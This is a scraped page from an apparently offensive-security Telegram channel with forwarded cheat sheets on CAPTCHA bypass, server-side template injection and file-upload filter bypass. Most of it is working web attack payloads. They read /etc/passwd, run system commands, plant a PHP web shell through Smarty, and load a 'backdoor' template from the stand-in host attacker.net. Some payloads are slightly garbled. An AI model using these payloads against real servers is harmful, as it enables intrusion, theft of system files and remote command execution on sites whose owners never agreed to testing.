πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
7.58K subscribers
75 photos
1 video
16 files
57 links
Offensive Security Certified Professional
@CEH_training
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
CAPTCHA Bypass

* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
Forwarded from Web Hacking
Google Dorks to Find Sensitive data or dir
Forwarded from Web Hacking
SSTI (Server Side Template Injection)

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Forwarded from Web Hacking
File Upload Bypass -

Blacklisting Bypass
PHP β†’ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP β†’ .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp β†’ .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion β†’ .cfm, .cfml, .cfc, .dbm
Perl β†’ .pl, .cgi
Using random capitalization β†’ .pHp, .pHP5, .PhAr

Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg